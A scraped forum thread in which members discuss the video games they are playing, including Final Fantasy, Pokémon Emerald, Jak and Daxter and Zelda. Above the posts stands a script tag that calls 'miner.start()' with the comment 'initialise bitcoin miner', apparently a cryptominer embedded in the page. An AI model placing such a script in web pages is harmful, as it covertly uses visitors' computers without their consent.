<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralsmbx communityirc.cat.bio

What games are you playing?

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
Kshaard
Phonotactically-non-conformist monosyllable
Pronouns: he/him/his

Re: What games are you playing?

Postby Kshaard » 10 months ago

So now that I've been a "gamer" for about a year I may as well do a fairly existent list on this thread for absolutely no reason.

Trying to get all the coins in Mario 64 as a last ditch effort to eke the absolute most enjoyment possible out of this game. Starting to doubt that Hazy Maze Cave is actually possible though (that one eye in the red coin room…).
Around halfway through the Forest Temple in Ocarina. Don't know why I haven't bothered to just finish that dungeon; it's probably something to do with
A Link between Worlds. Absolutely terrific as everyone in the universe knows. In a slight quandary about the power glove 2.0 as it seems I need to have it in order to get it. I must be missing something cringingly obvious. (pls no spiolres)
Final Fantasy 3 DS exists. 8 hours in and I stilll don't get the appeal of turn-based combat and random encounters over real-time doing stuff. My recent discovery that you can move in diagonals has changed my life, although it feels like you have to press really hard on the d-pad in order to actually achieve such advanced states of being.
I've been enjoying Lylat Wars a lot in spite of the quarter-second input lag and my utter inability to aim at anything. Just haven't had a long enough continuous length of time to make any real progress.
Although I've made some headway into Banjo-Kazooie it's sort of taken its place at the back of the queue at this point.
This is someone's signature.

Bean

Postby Bean » 10 months ago

Kshaard wrote:A Link between Worlds. Absolutely terrific as everyone in the universe knows. In a slight quandary about the power glove 2.0 as it seems I need to have it in order to get it. I must be missing something cringingly obvious. (pls no spiolres)

Final Fantasy 3 DS exists. 8 hours in and I stilll don't get the appeal of turn-based combat and random encounters over real-time doing stuff. My recent discovery that you can move in diagonals has changed my life, although it feels like you have to press really hard on the d-pad in order to actually achieve such advanced states of being.
ALBW is my favorite game of all-time. I won't spoil it for you. Enjoy. Some of those dungeons are great. As for turn-based combat, I think it gets better when they add the active time battle system to the mix once Final Fantasy IV came around. I-III are a little too old school for me.

Speaking of Final Fantasy, I'm still plowing away at the grind that XIII is in its post-game. I'm closing in on the 100% to make up for the one I never got for XII. Upgrading equipment to try and have a full inventory since that's one of the goals. Don't know why I'm so platinum crazy lately. Guess I've just got the gaming bug lately.

metasomnia?
First name: Meta

Postby metasomnia? » 10 months ago

Fortune Summoners is a thing. It's not often I try a 2D action RPG type game and then immediately get my butt handed to me by slimes right off the bat :/
Zyglrox Odyssey wrote:Eternal masochist that I am, I've decided I apparently wanna try to do a Bug monotype run of Pokémon Emerald (plus a Feebas for water HM purposes of course) without buying any healing items.
RIP. Good luck with that.

Jesuiscontent
Tsundere
First name: cool old field

Postby Jesuiscontent » 10 months ago

metasomnia? wrote:Fortune Summoners is a thing. It's not often I try a 2D action RPG type game and then immediately get my butt handed to me by slimes right off the bat :/
Haha yup. The game is very good at tricking you with cutesy graphics and music to make you lower your guard before murdering you.

HatKid
Pronouns: she/her

Postby HatKid » 10 months ago

metasomnia? wrote:Fortune Summoners is a thing. It's not often I try a 2D action RPG type game and then immediately get my butt handed to me by slimes right off the bat :/
Oh hey, a game I stopped playing because I felt like it was far to difficult to play with a keyboard. I've been meaning to go back to it though.

I finished Saints Row 2 and 3 within the last few days. I prefer 2 over 3 for sure. Why remove putting logos on clothing? Why is 3 so goddamn ridiculous? (Not that thats necessarily a bad thing) Why does every male in 3 have to be super ripped macho man?? Why take out septic avenger?? That was my fav activity in 2. Why are different levels of activities spread throughout the city in 3? It is nice that you can customise your cars in your garage in 3 though. I feel like 3 doesnt have the "soul" that 2 does, but I feel like I cant properly articulate this thought. Oh well. Looking forward to gettign 4 in the mail, the president in basically the matrix sounds pretty fun.

Zyglrox Odyssey

Postby Zyglrox Odyssey » 10 months ago

metasomnia? wrote:
Zyglrox Odyssey wrote:Eternal masochist that I am, I've decided I apparently wanna try to do a Bug monotype run of Pokémon Emerald (plus a Feebas for water HM purposes of course) without buying any healing items.
RIP. Good luck with that.
I've actually made it to Wattson since that post. Route 110 rival battle was a nightmare solely because of the Combusken but I did eventually get through it through sheer luck and an X Special I picked up at some point.
Wattson's Magneton is the new problem, all the accuracy drops in the world can't guard against a Shock Wave and while Nincada is immune to that it can only take like two Sonicbooms. Pretty sure it resists literally every offensive move I have too. And I believe after that Combusken the only healing item I have left is one Oran Berry? I'll get through it though, if nothing else there should be enough experience between all the trainers I've skipped so far to evolve Nincada and just kinda sweep him with a Shedinja.
ImageImage
ImageImage
ImageImage
ImageImage

raekuul
X&BUTT
First name: Pokota

Postby raekuul » 10 months ago

I got Freedom Planet from Maiku Wotaharu on Sunday, and now that my birthday's passed I can crack open that PSX copy of FF8 that I ordered a month ago.

Bean

Final Fantasy 13 status: 100%.

I'll probably move on to World of Final Fantasy next after recording the first part of my Super Mario Land 2 run.

YelseyKing
Meow what are you looking at?
First name: Matt

Postby YelseyKing » 10 months ago

Bean wrote:Final Fantasy 13 status: 100%.
Congrats! I didn't 100% it, because my perfectionism wouldn't let me. I'd missed a few bestiary entries earlier in the game, and as such saw little reason to go after the more time-consuming post-game challenges. I'll definitely do it on a replay, though... and I *did* 100% FF13-2. Which was actually admittedly much easier, but there were still some things that were... things. Like farming a super-boss for Trapezohedrons. That was... fun. (Though at least the battle played my favorite song in the FF13 trilogy. So that helped.)
Ayjo and Meya are watching you. Be on your best behavior.

Moists:

The (Talkhaus) Price is Right
Episode 6 is over. More to come... someday.

Alice
💙
Pronouns: Girl person

Postby Alice » 10 months ago

I started playing Dust: An Elysian Tail again on casual difficulty since raocow started his lp. I actually one fairly big complaint about casual mode, though I can sort of understand the decision behind it. Certain options such as auto-leveling are locked into the enabled position and you cannot disable them. I could understand enabling them by default on the save but locking them on is actually kinda annoying.

BurntTenda
I bring greetings from Apple World

Postby BurntTenda » 10 months ago

I started playing Final Fantasy XV, which is pretty fun.
Very plot hole-y, which hopefully will be fixed with patches.

But the combat is quite fun.

And sudden puzzle platforming in the Pitioss dungeon is both fun and a true nightmare.

Something goes here sometime.

Zyglrox Odyssey

Postby Zyglrox Odyssey » 10 months ago

Got to Lavaridge in my last Emerald play session. Maxie went down in one attempt somehow by way of Copenhagen the Volbeat being the ultimate scumlord, basically soloed the entire battle barring like one HP on his Zubat - at level 17 (his entire team is 24-25) - almost entirely through confusion damage.
Lavaridge Gym is still a touch frightening - I don't have a single super-effective attack to speak of since Surskit's not in Emerald - but the first three trainers in there went down with little issue anyway so I'm pretty sure I can find a way through it.
ImageImage
ImageImage
ImageImage
ImageImage

metasomnia?
First name: Meta

Postby metasomnia? » 10 months ago

Zyglrox Odyssey wrote:Got to Lavaridge in my last Emerald play session. Maxie went down in one attempt somehow by way of Copenhagen the Volbeat being the ultimate scumlord, basically soloed the entire battle barring like one HP on his Zubat - at level 17 (his entire team is 24-25) - almost entirely through confusion damage.
Badass. Image
Jesuiscontent wrote:Haha yup. The game is very good at tricking you with cutesy graphics and music to make you lower your guard before murdering you.
HatKid wrote:Oh hey, a game I stopped playing because I felt like it was far to difficult to play with a keyboard. I've been meaning to go back to it though.
Update: I kept getting my butt kicked for like two hours before I started developing something resembling basic combat skills and managed to finish the prologue. I'm also playing with the keyboard by the way. Also, I'm enjoying the fact that while it's difficult to level up, there aren't many levels and each one grants a fair bump up in stats, giving you much more survivability.

BurntTenda

FINALLY I DID IT I BEAT THE PITIOSS DUNGEON!

And now on to the other dungeons and maybe do the Menace dungeons.

Bean

Chose to start up World of Final Fantasy on the PS4 a couple days ago. Was not expecting it to also be my first ever experience with Pokémon, but here we are. Seems fun enough to go through. The dialogue is making it more enjoyable since it's filled with puns and other dumb good moments. Kind of glad I went with this one for now instead of diving right into FFXV.

Sorel
In the shadows
First name: Alexander

Postby Sorel » 10 months ago

After playing up to the final chapter of FFXV, I can only recommend it to anyone who likes a good

and sad

story, Kingdom Hearts-ish gameplay, or both.

FFXIV on the other hand is something completely different, a MMO. And a really good one at that. Picked the Black Mage as my starting job, and it's really fun to spam fire until everything is dead use spells.

As a side note, if you don't have enough FF in your life already, you should give Brave Exvius a shot. It's a gacha-type mobile game, but compared to others, it's actually really forgiving and accessible for F2P-players because even the "crappy" gacha pulls are worthwhile to keep and raise. There's also lots of fanservice (not the perverted type, the nostalgia one.).
ImageImageImageImageImage
If you need something translated to german or something german to english, feel free to PM me. I'll get to it eventually.

BurntTenda

I beat my first

Menace dungeon

After every encounter Prompto just continuously said,
"Woohoo, we're alive! Let's celebrate by eating something dead!"

After every encounter.

It got a little annoying.

Bean

Maybe I chose the right Final Fantasy to go with for now then by choosing World of. This game's comedy is really hitting the right notes with me, and the battle system's pretty fun, too. You get two stacks of three to work with at the start of battles, but you can unstack and have six playable characters going against enemies. Rarely recommend doing this since your stats are way lower individually, but sometimes it's needed when you want to catch your opponents and get them on your team.

It's literally Final Fantasy meets Pokémon, and I'm surprisingly enjoying it so far.

YelseyKing

I got the Jak trilogy for Christmas, so I figured I'd take a short break from my Shadow Hearts marathon and play the first game. It's pretty fun. I've always liked the old-school 3D collectathon platformer, so this one's right up my alley. I appreciate that pick-ups are automatically saved, and don't have to be re-collected if/when you die... and also that there's no lives. You just restart from a checkpoint. Having to collect every randomly scattered doodad around large stages in one go can be a huge hassle, so I'm thankful *that* isn't a thing I have to worry about.

Daxter is an annoying little puke, though. :P

Moists:

pholtos
Loves adorable things.

Postby pholtos » 10 months ago

YelseyKing wrote:I got the Jak trilogy for Christmas, so I figured I'd take a short break from my Shadow Hearts marathon and play the first game.
And then you play the second game and go "what the heck happened" :P
Host and Organizer of the Rando Pokemon Tournaments. Completed: I, II, III, IV, V
Pokemon Gimmick Free For All Feel free to join in the fun! :3

ImageImageImageImage

I do LPs, check them out if you'd like.
Currently playing:

YelseyKing

pholtos wrote:
YelseyKing wrote:I got the Jak trilogy for Christmas, so I figured I'd take a short break from my Shadow Hearts marathon and play the first game.
And then you play the second game and go "what the heck happened" :P
Hah, yeah, I've heard that 2 is... very different from 1, to put it mildly. And then 3 goes on to be very different from 2. Kind of weird how that series changed genres every game.

Moists:

ZephyrBurst
That Angry Scripting Guy
Pronouns: He

Postby ZephyrBurst » 10 months ago

Other than the last fishing quest, I did everything FF15 has to do. Got the platinum trophy as well which I didn't even realize I had.
BurntTenda wrote:I beat my first

Menace dungeon

After every encounter Prompto just continuously said,
"Woohoo, we're alive! Let's celebrate by eating something dead!"

After every encounter.

It got a little annoying.
He did that to me for 2 of them. I was less annoyed and more just giggling in hilariously stupid ways by about the 4th time. (Luckily everyone else was asleep.)
Also congrats. I felt underwhelmed to see what the Menace dungeons were. Still did them all, but blarg, I was hoping for at least something a little different here and there.

The last one aside anyway.

To BurntTenda

Pitioss was weird. Most of it was really neat and despite FF15 not really being built around stuff like that, it played surprisingly well. And then there were about 3 moments(jumps) that had me to a near boiling point. Jumping from one tiny steel beam to another in third person with fucking momentum on Noctis' movement... ugh. That giant spike skull wall was bad ass looking though.

Going through there, I forgot I was even playing FF15. Really it didn't feel like FF at all and was one of the more bizarre things in the series for me. Really neat though and seeing how the game handled that dungeon so well, I couldn't help but feel like some other parts of the game could have benefited from things like that.

Also I <3 the soundtrack. Really good like usual. Favorite track

BurntTenda

Thinking in 45 degree angles, awesome yet strange and sometimes difficult.

I've been focusing on doing hunts in FFXV.
I kinda wish you could take on more than 1 at a time...

YelseyKing

Just finished Jak and Daxter. Pretty fun game, on the whole; I always enjoy a good 3D collectathon platformer, and being a semi-early-ish PS2 game, it was surprising how well it handled the game's open-world aspect. I did 100% it (101%, actually), naturally.

The only quibbles I have about the game are that it felt kind of cheap that many of the power cells were just "buy for X0 orbs", but I guess it at least made it worthwhile to *collect* the orbs. Shame nothing appears to be unlocked for 100% power cells or orbs, but it was fun gathering them all, at least. The other issue is that the double jump mechanic felt... off. Sometimes the game just wouldn't let me double jump, and while I could never concretely put my finger on just what caused it, my best guess is that if you're over a bottomless pit, and you descend even slightly from your initial jump, the game will register you as falling, and won't let you get off the second jump. Extremely annoying, and made the final stage *much* harder to get through than it was probably intended to be... but it wasn't game-ruining or anything.

Also, rather interesting how the 100% ending is a massive sequel hook, yet the next game went in a *completely* different direction. Go figure.

Moists:

CrappyBlueLuigi
pants are a tool of oppression
First name: Crepe
Pronouns: they/them

Postby CrappyBlueLuigi » 10 months ago

i recently got into the single player of game & wario, which is really fun and varied! i'm surprised i never heard much about it before now. the patchwork game has hooked me the most by far.
someday, when i'm bigger,
i'm gonna be just like my mama!

Return to “the cartridgé”